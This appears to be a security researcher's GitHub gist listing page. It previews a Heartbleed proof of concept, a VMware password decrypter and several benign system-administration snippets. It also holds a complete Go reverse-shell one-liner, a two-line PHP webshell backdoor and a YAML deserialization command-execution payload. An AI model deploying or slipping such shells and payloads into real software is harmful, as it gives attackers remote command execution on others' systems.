Skip to content

Instantly share code, notes, and snippets.

View takeshixx's full-sized avatar
👾

Niklaus Schiess takeshixx

👾
135 followers · 1 following
View GitHub Profile
@takeshixx
takeshixx / hb-test.py
Last active March 9, 2024 13:37
OpenSSL heartbeat PoC with STARTTLS support.
#!/usr/bin/env python2
"""
Author: takeshix <takeshix@adversec.com>
PoC code for CVE-2014-0160. Original PoC by Jared Stafford (jspenguin@jspenguin.org).
Supportes all versions of TLS and has STARTTLS support for SMTP,POP3,IMAP,FTP and XMPP.
"""
import sys,struct,socket
from argparse import ArgumentParser
@takeshixx
takeshixx / ubuntu-xenial-armfh-qemu.md
Last active October 22, 2023 12:14
Running Ubuntu 16.04.1 armhf on Qemu

Running Ubuntu 16.04.1 armhf on Qemu

This is a writeup about how to install Ubuntu 16.04.1 Xenial Xerus for the 32-bit hard-float ARMv7 (armhf) architecture on a Qemu VM via Ubuntu netboot.

The setup will create a Ubuntu VM with LPAE extensions (generic-lpae) enabled. However, this writeup should also work for non-LPAE (generic) kernels.

The performance of the resulting VM is quite good, and it allows VMs with >1G ram (compared to 256M on versatilepb and 1G on versatile-a9/versatile-a15). It also supports virtio disks whereas versatile-a9/versatile-a15 only support SD cards via the -sd argument.

Get netboot files

@takeshixx
takeshixx / contab-jails.sh
Last active February 22, 2022 22:37
Crontab script for FreeBSD Jails (update seperate ports tree, run portaudit, check for port updates)
#!/usr/local/bin/zsh
JAIL_PORTS=/usr/jails/ports
SHELL=/usr/local/bin/zsh
PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/sbin:/usr/local/bin:/root/bin
SECTION=' * * * * * * '
DELIMITER='------------------------------'
portsnap -p $JAIL_PORTS fetch extract &>/dev/null || echo "Updating ports tree failed!"
echo "# VULNERABILITIES"
@takeshixx
takeshixx / shell.go
Last active November 8, 2020 18:48
Golang reverse shell
echo 'package main;import"os/exec";import"net";func main(){c,_:=net.Dial("tcp","127.0.0.1:1337");cmd:=exec.Command("/bin/sh");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run();}'>/tmp/sh.go&&go run /tmp/sh.go
@takeshixx
takeshixx / shell.php
Created April 5, 2014 14:07
PHP webshell/backdoor
// Call: http://localhost/shell.php?f=system&c=id
<?@extract($_REQUEST);@die($f($c));?>
@takeshixx
takeshixx / vcops-passwords.py
Created August 12, 2014 17:55
VMware vCenter Operations Manager password de/encrypter
#!/usr/bin/env python2
# VMware vCenter Operations Manager password de/encrypter
# author: takeshix@adversec.com
from sys import argv,exit
from base64 import b64encode,b64decode
from Crypto.Cipher import AES
class vCopsCrypt:
# AES128 wrapper class with PKCS5 padding
BLOCK_SIZE = 16
@takeshixx
takeshixx / yamlexec.py
Created July 6, 2016 10:01
yaml.load('!!python/object/apply:os.system ["id"]')
@takeshixx
takeshixx / parser.c
Created December 9, 2018 02:20
#include <uapi/linux/ptrace.h>
#include <net/sock.h>
#include <bcc/proto.h>
#define ETH_HLEN 14
/*eBPF program.
Filter Packets
return 0 -> DROP the packet
return -1 -> KEEP the packet and return it to user space (userspace can read it from the socket_fd )
@takeshixx
takeshixx / csgoblog.py
Last active December 5, 2018 14:20
Poll CS:GO blog for new blog posts.
#!/usr/bin/env python3
import sys
import time
import requests
import smtplib
import email.message
from lxml import html
SMTP_HOST = 'localhost'
SMTP_PORT = 25
@takeshixx
takeshixx / asyncio_ssl_example.py
Created May 12, 2016 15:08 — forked from messa/asyncio_ssl_example.py
Python asyncio + SSL TCP client/server example
#!/usr/bin/env python3
import asyncio
import multiprocessing
import os
import ssl
from time import sleep
port = 9000